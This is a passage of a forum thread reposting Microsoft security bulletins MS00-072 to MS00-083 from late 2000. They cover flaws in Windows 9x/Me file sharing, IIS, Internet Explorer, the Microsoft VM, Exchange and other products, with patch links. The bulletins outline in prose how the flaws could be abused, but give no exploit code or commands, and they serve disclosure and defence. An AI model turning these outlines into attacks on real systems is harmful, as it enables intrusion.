Continued from MS Security Bulletins - Vol. 9 (http://sysopt.earthweb.com/forum/Forum1/HTML/007513.html)
=============================================
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-072)
- --------------------------------------
Patch Available for "Share Level Password" Vulnerability
Originally posted: October 10, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows 95, 98, 98SE, and Windows Me.
The vulnerability could allow a malicious user to programmatically
access a Windows 9x/ME file share without knowing the entire password
assigned to that share.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-072.asp
Issue
=====
Microsoft Windows 9x/Me provides a password protection feature
referred to as (share level access) for the File and Print Sharing
service. However, due to the way the password feature is currently
implemented, a file share could be compromised, by a malicious user
who used a special client utility, without that user knowing the
entire password required to access that share.
Only share level access permissions are vulnerable. If a Windows 9x
or Windows Me machine were part of a Windows NT domain, user-level
access controls could be enforced on file shares and passwords would
not be needed to allow access to those shares. Windows NT and Windows
2000 machines can only be setup with user-level file share access
controls and are not susceptible to this vulnerability.
Affected Software Versions
==========================
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows 98 Second Edition
Microsoft Windows Me
Patch Availability
==================
Microsoft Windows 95
Patch available shortly
Microsoft Windows 98 and 98 Second Edition http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/
273991USA8.EXE
Microsoft Windows Me http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/
273991USAM.EXE
Note Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
Frequently Asked Questions: Microsoft Security Bulletin MS00-072, http://www.microsoft.com/technet/security/bulletin/fq00-072.asp
Microsoft Knowledge Base article Q273991 discusses this issue and
will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks Nsfocus Security Team http://www.nsfocus.com for
reporting this issue to us and working with us to protect customers.
Revisions
October 10, 2000: Bulletin Created.
socalgal
10-11-2000, 05:59 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-073)
- --------------------------------------
Patch Available for "Malformed IPX NMPI Packet" Vulnerability
Originally posted: October 11, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows 95, Windows 98, 98 Second
Edition and Windows Me. The vulnerability could be used to cause an
affected system to fail, and depending on the number of affected
machines on a network, potentially could be used to flood the network
with superfluous data. The affected system component normally is
present only if it has been deliberately installed.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-073.asp
Issue
=====
The Microsoft IPX/SPX protocol implementation (NWLink) includes an
NMPI (Name Management Protocol on IPX) listener that will reply to
any requesting network address. The NMPI listener software does not
filter the requesting computer's network address correctly, and will
therefore reply to a network broadcast address. Such a reply would in
turn cause other IPX NMPI listener programs to also reply. This
sequence of broadcast replies could generate a large amount of
unnecessary network traffic. A machine that crashed due to this
vulnerability could be put back into service by rebooting.
IPX is not installed by default in Windows 98, 98 Second Edition, or
Windows Me, and is only installed by default in Windows 95 if there
is a network card present in the machine at installation time. Even
when IPX is installed, a malicious user's ability to exploit this
vulnerability would depend on whether he could deliver a malformed
NMPI packet to an affected machine. Routers frequently are configured
to drop IPX packets, and if such a router lay between the malicious
user and an affected machine, he could not attack it. Routers on the
Internet, as a rule, do not forward IPX packets, and this would tend
to protect intranets from outside attack, as well as protecting
machines connected to the Internet via dial-up connections. As
discussed in the FAQ, the most likely scenario in which this
vulnerability could be exploited would be one in which a malicious
user on an intranet would attack affected machines on the same
intranet, or one in which a malicious user on the Internet attacked
affected machines on his cable modem or DSL subnet.
Affected Software Versions
==========================
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98 Second Edition
- Microsoft Windows Me
Patch Availability
==================
- Microsoft Windows 95
http://download.microsoft.com/download/win95/Update/11974/W95/EN-US/273727USA5.EXE
- Microsoft Windows 98 and 98 Second Edition
http://download.microsoft.com/download/win98SE/Update/11974/W98/EN-US/273727USA8.EXE
- Microsoft Windows Me
http://download.microsoft.com/download/winme/Update/11974/WinMe/EN-US/273727USAM.EXE
Note: The above links have been broken for better readability.
Note Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-073,
http://www.microsoft.com/technet/security/bulletin/fq00-073.asp
- Microsoft Knowledge Base article Q273727 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions
=========
- October 11, 2000: Bulletin Created.
socalgal
10-11-2000, 08:25 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-074)
- --------------------------------------
Patch Available for "WebTV for Windows Denial of Service"
Vulnerability
Originally posted: October 11, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) WebTV for Windows. The vulnerability
could allow a malicious user to remotely crash systems running WebTV
for Windows.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-074.asp
Issue
=====
There is a denial of service vulnerability in WebTV for Windows that
may allow a malicious user to remotely crash either the WebTV for
Windows application and/or the computer system running WebTV for
Windows. Restarting the application and/or system will return the
system to its normal state.
Although the WebTV for Windows application ships with Windows 98,
98SE and Windows Me products, the application is not installed by
default, and customers who have not installed it would not be at
risk.
Affected Software Versions
==========================
- Microsoft WebTV for Windows on Windows 98, Windows 98SE, and
Windows Me
NOTE: This vulnerability is not related to the WebTV(tm) service
provided by WebTV Networks.
Patch Availability
==================
- Windows 98 and 98SE http://download.microsoft.com/download/win98SE/Update/12278/W98/EN-US/274113USA8.EXE
- Windows Me http://download.microsoft.com/download/winme/Update/12278/WinMe/EN-US/274113USAM.EXE
NOTE: The above URLS may have been wrapped
NOTE: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-074,
http://www.microsoft.com/technet/security/bulletin/fq00-074.asp
- Microsoft Knowledge Base article Q274113 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions
=========
- October 11, 2000: Bulletin Created.
socalgal
10-12-2000, 04:48 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-075)
- --------------------------------------
Patch Available for "Microsoft VM ActiveX Component" Vulnerability
Originally posted: October 12, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) virtual machine (Microsoft VM). If a
malicious web site operator were able to coax a user into visiting
his site, the vulnerability could allow him to take any desired
action on a visiting user's machine.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-075.asp
Issue
=====
The Microsoft VM is a virtual machine for the Win32(r) operating
environment. It runs atop Microsoft(r) Windows 95, 98, Windows Me,
Windows NT 4.0, or Windows 2000. It ships as part of each operating
system, and also as part of Microsoft Internet Explorer. The version
of the Microsoft VM that ships with Microsoft Internet Explorer 4.x
and Internet Explorer 5.x contains a security vulnerability that
could allow a Java applet, on a malicious web site to take any
desired action on a visiting user's machine.
The Microsoft virtual machine (Microsoft VM) contains functionality
that allows ActiveX controls to be created and manipulated by Java
applications or applets. This functionality is intended to only be
available to stand-alone Java applications or digitally signed
applets. However, this vulnerability allows ActiveX controls to be
created and used from a web page, or from within a HTML based e-mail
message, without requiring a signed applet. If a user visited a
malicious web site that exploited this vulnerability, a Java applet
on one of the web pages could run any desired ActiveX control, even
ones that are marked as unsafe for scripting. This would enable the
malicious web site operator to take any desired action on the user's
machine.
Web sites placed within the Restricted Sites zone in Internet
Explorer will not be able to exploit this vulnerability.
Affected Software Versions
==========================
Versions of the Microsoft VM are identified by build numbers, which
can be determined using the JVIEW tool, as discussed in the FAQ. The
following builds of the Microsoft VM are affected:
- All builds in the 2000 series.
- All builds in the 3100 series.
- All builds in the 3200 series.
- All builds in the 3300 series.
Patch Availability
==================
- 2000-series Microsoft VM customers will be provided with an update
soon.
- 3100-series Microsoft VM customers upgrade to build 3318 or later
from:
http://www.microsoft.com/java/vm/dl_vm40.htm
- 3200-series Microsoft VM customers upgrade to build 3318 or later
from:
http://www.microsoft.com/java/vm/dl_vm40.htm
- 3300-series Microsoft VM customers upgrade to build 3318 or later
from:
http://www.microsoft.com/java/vm/dl_vm40.htm
This fix supersedes the patch supplied in MS00-059
Note Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-75,
http://www.microsoft.com/technet/security/bulletin/fq00-075.asp
- Microsoft Knowledge Base (KB) article Q275609,
http://www.microsoft.com/technet/support/kb.asp?ID=275609
discusses
this issue in more detail.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions
=========
- October 12, 2000: Bulletin Created.
socalgal
10-13-2000, 06:22 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-076)
- --------------------------------------
Patch Available for "Cached Web Credentials" Vulnerability
Originally posted: October 12, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Internet Explorer. Under a daunting
set of conditions, the vulnerability could enable a malicious user to
obtain another user's userid and password to a web site.
Frequently asked questions regarding this vulnerability
and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-076.asp
Issue
=====
When a user authenticates to a secured web page via Basic
Authentication, IE caches the userid and password that were used, in
order to minimize the number of times the user must authenticate to
the same site. By design, IE should only send the cached credentials
to secured pages on the site. However, it will actually send them to
non-secure pages on the site as well. If a malicious user had
complete control of another user's network communications, he could
wait until another user logged onto a secured site, then spoof a
request for a non-secured page in order to collect the credentials.
The vulnerability does not provide a means by which the malicious
user could force the other user to log onto a secure page of his
choice, and could only be used to reveal credentials that had been
cached during the current IE session.
Affected Software Versions
==========================
- Microsoft Internet Explorer 4.x
- Microsoft Internet Explorer 5.x prior to version 5.5
Note: Internet Explorer 5.5 is not affected by this vulnerability.
Customers using IE 5.5 do not need to take any action.
Note: The patch requires IE 5.01 SP1 to install. Customers who
install this patch on other versions may receive a message reading
"This update does not need to be installed on this system". This
message is incorrect. More information is available in KB article
Q273868.
Note: As discussed in Affected Software Versions, this vulnerability
does not affect IE 5.5.
Note: Per the normal security support policy for IE, security patches
for Internet Explorer version 4.x are no longer being produced.
Microsoft recommends that IE 4.x customers who are concerned about
this issue consider upgrading to either IE 5.01 SP1 or IE 5.5.
Note: The fix for this issue will be included in IE 5.01 SP2.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-076,
http://www.microsoft.com/technet/security/bulletin/fq00-076.asp
- Microsoft Knowledge Base article Q273868 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product
Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks ACROS Security http://www.acros.si for reporting
this issue to us and working with us to protect customers.
Revisions
=========
- October 12, 2000: Bulletin Created.
socalgal
10-13-2000, 06:32 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-077)
- --------------------------------------
Patch Available for "NetMeeting Desktop Sharing" Vulnerability
Originally posted: October 13, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in NetMeeting, an application that ships with
Microsoft(r) Windows 2000 and is also available as a separate
download for Windows NT 4.0. The vulnerability could allow a
malicious user to temporarily prevent an affected machine from
providing any NetMeeting services and possibly consume 100% CPU
utilization during an attack.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-077.asp
Issue
=====
A remote denial of service vulnerability has been discovered in a
component of NetMeeting. The denial of service can occur when a
malicious client sends a particular malformed string to a port which
the NetMeeting service is listening on and with Remote Desktop
Sharing enabled.
Although the NetMeeting application is provided as part of Windows
2000 products, the application and affected component is not enabled
by default, and customers who have not enabled it would not be at
risk from this vulnerability.
Affected Software Versions
==========================
NetMeeting Version 3.01 (4.4.3385) on Windows 2000 or Windows NT 4.0.
Patch Availability
==================
- Windows 2000 and Windows NT 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25029
Note Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-077,
http://www.microsoft.com/technet/security/bulletin/fq00-077.asp
- Microsoft Knowledge Base article Q273854 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks Kirk Corey of Diversified Software Industries, Inc.
www.dsi-inc.net (http://www.dsi-inc.net) for reporting this issue to us and working with us
to protect customers.
Revisions
=========
- October 13, 2000: Bulletin Created.
socalgal
10-17-2000, 08:03 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-078)
- --------------------------------------
Patch Available for "Web Server Folder Traversal" Vulnerability
Originally posted: October 17, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) IIS 4.0 and 5.0. The vulnerability
could potentially allow a visitor to a web site to take a wide range
of destructive actions against it, including running programs on it.
This vulnerability is eliminated by the patch that accompanied
Microsoft Security Bulletin MS00-057. Customers who have applied
that patch are already protected against the vulnerability and do not
need to take additional action. Microsoft strongly urges all
customers using IIS 4.0 and 5.0 who have not already done so to apply
the patch immediately.
Frequently asked questions regarding this vulnerability
and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-078.asp
Issue
=====
Due to a canonicalization error in IIS 4.0 and 5.0, a particular type
of malformed URL could be used to access files and folders that lie
anywhere on the logical drive that contains the web folders. This
would potentially enable a malicious user who visited the web site
to gain additional privileges on the machine - specifically, it could
be used to gain privileges commensurate with those of a locally
logged-on user. Gaining these permissions would enable the malicious
user to add, change or delete data, run code already on the server,
or upload new code to the server and run it.
The request would be processed under the security context of the
IUSR_machinename account, which is the anonymous user account for
IIS. Within the web folders, this account has only privileges that
are appropriate for untrusted users. However, it is a member of the
Everyone and Users groups and, as a result, the ability of the
malicious user to access files outside the web folders becomes
particularly significant. By default, these groups have execute
permissions to most operating system commands, and this would give
the malicious user the ability to cause widespread damage. Customers
who have proactively removed the Everyone and Users groups from
permissions on the server, or who are hosting the web folders on a
different drive from the operating system, would be at significantly
less risk from the vulnerability.
Microsoft strongly recommends that all customers running IIS 4.0 or
5.0 immediately apply the patch for this vulnerability. This patch
was originally released in August 2000 as a fix for a completely
different vulnerability (discussed in Microsoft Security Bulletin
MS00-057), and customers who have already applied it do not need to
take any additional action.
Affected Software Versions
==========================
- Microsoft IIS 4.0
- Microsoft IIS 5.0
Patch Availability
==================
- Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862
- Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q269862
Note: The IIS 4.0 patch can be installed on systems running Windows
NT(r) 4.0 Service Packs 5 and 6a. It will be included in Windows NT
4.0 Service Pack 7. The IIS 5.0 patch can be installed on systems
running either Windows(r) 2000 Gold or Service Pack 1. It will be
included in Windows 2000 Service Pack 2.
Note: The Download Center pages discussed above may, for the next
several days, only reference the "File Permissions Canonicalization"
vulnerability. However, we are updating the pages to state that it
applies to both that vulnerability and this one.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-078,
http://www.microsoft.com/technet/security/bulletin/fq00-078.asp
- Microsoft Security Bulletin MS00-057, Microsoft Security Bulletin
http://www.microsoft.com/technet/security/bulletin/ms00-057.asp
- Microsoft Knowledge Base article Q276489 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks Rain Forest Puppy for reporting this issue to us and
working with us to protect customers.
Revisions
=========
- October 17, 2000: Bulletin Created.
socalgal
10-18-2000, 08:01 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-079)
- - --------------------------------------
Patch Available for "HyperTerminal Buffer Overflow" Vulnerability
Originally posted: October 18, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in the HyperTerminal application that ships with
several Microsoft(r) operating systems. This vulnerability could,
under certain circumstances, allow a malicious user to execute
arbitrary code on another user's system.
Frequently asked questions regarding this vulnerability and the patch
can be found at http://www.microsoft.com/technet/security/bulletin/fq00-079.asp
Issue
=====
The HyperTerminal application is a utility that installs, by default,
on all versions of Windows 98, 98SE, Windows ME, Windows NT, and
Windows 2000. The product contains an unchecked buffer in a section
of the code that processes Telnet URLs. If a user opened an HTML mail
that contained a particularly malformed Telnet URL, it would result
in a buffer overrun that could enable the creator of the mail to
cause arbitrary code to run on the user's system. Please note that,
although a Telnet URL is involved in this vulnerability, there is no
relationship between this vulnerability and the "Windows 2000 Telnet
Client NTLM Authentication" vulnerability discussed in MS00-067.
HyperTerminal is the default Telnet client on Windows 98, 98SE and
ME. However, it is not the default Telnet client on Windows 2000, and
Windows 2000 users who have not taken steps to make it the default
Telnet client would not be affected by the vulnerability.
Although HyperTerminal ships as part of several Microsoft products,
it was developed by a third party - Hilgraeve, Inc. Additional
information on the vulnerability and a patch for their full version
product, HyperTerminal Private Edition, is available from their web
site at http://www.hilgraeve.com
Affected Software Versions
==========================
- Microsoft Windows 98 and Windows 98SE
- Microsoft Windows Me
- Microsoft Windows 2000
Patch Availability
==================
- Windows 98 and 98SE:
http://download.microsoft.com/download/win98/Update/12395/W98/EN-US/274548USA8.EXE
- Windows Me:
http://download.microsoft.com/download/winme/Update/12395/WinMe/EN-US/274548USAM.EXE
- Windows 2000 (can be applied to both Gold and Service Pack 1):
http://www.microsoft.com/downloads/release.asp?releaseid=25112
Note: The above URLs may have been wrapped for readability.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-079,
http://www.microsoft.com/technet/security/bulletin/fq00-079.asp
- Microsoft Knowledge Base articles Q274548 (Win9x) and Q276471
(Win2K) discuss this issue and will be available soon.
- A patch for HyperTerminal Private Edition (a for-purchase upgrade
from the default client) is available from
http://www.hilgraeve.com
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks Luciano Martins of USSR Labs www.ussrback.com (http://www.ussrback.com) for
reporting this issue to us and working with us to protect customers.
Revisions
=========
October 18, 2000: Bulletin Created.
socalgal
10-23-2000, 09:29 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-080)
- --------------------------------------
Patch Available for "Session ID Cookie Marking" Vulnerability
Originally posted: October 23, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Internet Information Server. The
vulnerability could allow a malicious user to "hijack" another user's
secure web session, under a very restricted set of circumstances.
Frequently asked questions regarding this vulnerability
and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-080.asp
Issue
=====
IIS supports the use of a Session ID cookie to track the current
session identifier for a web session. However, .ASP in IIS does not
support the creation of secure Session ID cookies as defined in RFC
2109. As a result, secure and non-secure pages on the same web site
use the same Session ID. If a user initiated a session with a secure
web page, a Session ID cookie would be generated and sent to the
user, protected by SSL. But if the user subsequently visited a
non-secure page on the same site, the same Session ID cookie would
be exchanged, this time in plaintext. If a malicious user had
complete control over the communications channel, he could read the
plaintext Session ID cookie and use it to connect to the user's
session with the secure page. At that point, he could take any
action on the secure page that the user could take.
The conditions under which this vulnerability could be exploited are
rather daunting. The malicious user would need to have complete
control over the other user's communications with the web site. Even
then, the malicious user could not make the initial connection to
the secure page - only the legitimate user could do that. The patch
eliminates the vulnerability by adding support for secure Session ID
cookies in .ASP pages. (Secure cookies already are supported for all
other types of cookies, under all other technologies in IIS).
Affected Software Versions
==========================
- Microsoft Internet Information Server 4.0
- Microsoft Internet Information Services 5.0
Note: The patch installs support for secure Session ID cookies, but
does not enable it for reasons of application compatibility. As
discussed in the Knowledge Base article, it can be enabled or
disabled on a site-by-site basis.
Note:
- The IIS 4.0 version of this patch can be installed on Windows
NT(r) 4.0 systems running Service Pack 6a, and will be included in
Service Pack 7.
- The IIS 5.0 version of this patch can be installed on
Windows(r) 2000 systems with or without Service Pack 1, and will
be included in Service Pack 2.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-080,
http://www.microsoft.com/technet/security/bulletin/fq00-080.asp
- Microsoft Knowledge Base article Q274149 discusses this issue
and will be available soon.
- RFC 2109, HTTP State Management,
http://www.ietf.org/rfc/rfc2109.txt.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments
===============
Microsoft thanks ACROS Security (http://www.acros.si/) and Ron Sires
and C. Conrad Cady of Healinx http://www.healinx.com/ for
reporting this issue to us and working with us to protect customers.
Revisions
=========
- October 23, 2000: Bulletin Created.
socalgal
10-25-2000, 07:39 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-081)
- --------------------------------------
Patch Available for New Variant of "VM File Reading" Vulnerability
Originally posted: October 25, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in the Microsoft(r) virtual machine (Microsoft VM)
that originally was discussed in Microsoft Security Bulletin
MS00-011. Like the original vulnerability, the new variant could
enable a malicious web site operator to read files from the computer
of a person who visited his site or read web content from inside an
intranet if the malicious site was visited by a computer from within
that intranet.
Frequently asked questions regarding this vulnerability and the
patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-081.asp
Issue
=====
The Microsoft VM is a virtual machine for the Win32(r) operating
environment. It runs atop Microsoft Windows(r) 95, 98, Me, Windows
NT(r) 4.0, and Windows 2000. It ships as part of each operating
system, and also as part of Microsoft Internet Explorer.
The version of the Microsoft VM that ships with Microsoft Internet
Explorer 4.x and Internet Explorer 5.x contains a security
vulnerability that could allow a Java applet to operate outside the
bounds set by the sandbox. A malicious user could write a Java
applet that could read - but not change, delete or add - files from
the computer of a person who visited his site or read web content
from inside an intranet if the malicious site is visited by a
computer from within that intranet.
The vulnerability at issue here is a new variant of the vulnerability
originally discussed in Microsoft Security Bulletin MS00-011. The
only significant difference between the new and original variants
lies in the specific programming technique used to exploit the
vulnerability; in other respects, the two are virtually identical.
Applying the new patch eliminates both the new and original
variants.
Affected Software Versions
==========================
Versions of the Microsoft VM are identified by build numbers, which
can be determined using the JVIEW tool, as discussed in the FAQ. The
following builds of the Microsoft VM are affected:
- All builds in the 2000 series.
- All builds in the 3000 series.
Note: The Microsoft VM ships as part of several products. However,
the primary ship vehicle is Internet Explorer.
Patch Availability
==================
New versions of the Microsoft VM that include a fix for the
vulnerability can be downloaded from the following locations:
- 2000-series builds:
A patch specifically for the 2000-series builds will be available
shortly. Customers who wish to eliminate the vulnerability can
also do so by upgrading to build 3319 at
http://www.microsoft.com/java/vm/dl_vm40.htm
- 3000-series:
Upgrade to build 3319 or later at
http://www.microsoft.com/java/vm/dl_vm40.htm.
Note: 2000-series builds are shipped as part of Internet Explorer
4.x; 3000 series builds are shipped as part of Internet Explorer
5.x. However, customers may upgrade the Microsoft VM on their
machines independent of the browser, and the Microsoft VM also ships
as part of many other applications, so it is possible for the actual
build number to be higher than the one associated with the version
of IE that is installed on the machine. In such cases, customers
should determine what version of the patch to install based on the
build number, not on the version of IE.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-081,
http://www.microsoft.com/technet/security/bulletin/fq00-081.asp
- Microsoft Security Bulletin MS00-011,
http://www.microsoft.com/technet/security/bulletin/ms00-011.asp.
- Microsoft Knowledge Base article Q277014 discusses this issue and
will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions
=========
- October 25, 2000: Bulletin Created.
socalgal
10-31-2000, 06:02 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-082)
- --------------------------------------
Patch Available for "Malformed MIME Header" Vulnerability
Originally posted: October 31, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Exchange Server 5.5. The vulnerability
could enable a malicious user to cause an Exchange server to fail.
Frequently asked questions regarding this vulnerability
and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-082.asp
Issue
=====
As part of its normal processing of incoming mails, Exchange server
checks for invalid values in the MIME header fields. However, if a
particular type of invalid value is present in certain fields, the
Exchange service will fail. Normal operations can be restored by
restarting the Exchange service and deleting the offending mail.
There is no capability via this vulnerability to add, delete or
modify emails, nor is there any capability to usurp administrative
privileges on the server. The vulnerability can be eliminated either
by apply the patch or Exchange 5.5 Service Pack 4, which is due to
be released shortly. Exchange 2000 is not affected by the
vulnerability.
Affected Software Versions
==========================
- Microsoft Exchange Server 5.5
Note: Exchange Server 2000 is not affected by the vulnerability.
Patch Availability
==================
- Microsoft Exchange Server 5.5:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25443
Note: This patch can be applied atop systems running Exchange Server
5.5 Service Pack 3. It is included in Exchange Server 5.5 Service
Pack 4.
Note: Additional security patches are available at the Microsoft
Download Center
More Information
================
Please see the following references for more information related to
this issue.
- Frequently Asked Questions: Microsoft Security Bulletin MS00-082,
http://www.microsoft.com/technet/security/bulletin/fq00-082.asp
- Microsoft Knowledge Base article Q275714 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Microsoft
Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Acknowledgments
===============
Microsoft thanks Art Savelev http://www.savelev.com for reporting
this issue to us and working with us to protect customers.
Revisions
=========
- October 31, 2000: Bulletin Created.
socalgal
11-01-2000, 06:52 PM
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
-----BEGIN PGP SIGNED MESSAGE-----
Microsoft Security Bulletin (MS00-083)
- --------------------------------------
Patch Available for "Netmon Protocol Parsing" Vulnerability
Originally posted: November 01, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows NT(r) and Windows(r) 2000
server products and Systems Management Server. The vulnerability
could allow a malicious user to gain control of an affected server.
Frequently asked questions regarding this vulnerability and
the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-083.asp
Issue
=====
Microsoft ships two versions of Network Monitor (Netmon): a basic
version that ships with Windows NT 4.0 and Windows 2000 server
products, and full version that ships as part of Systems Management
Server (SMS) 1.2 and 2.0. Both versions include protocol parsers that
aid administrators in interpreting and analyzing previously-captured
network data. However, several of the parsers have unchecked buffers.
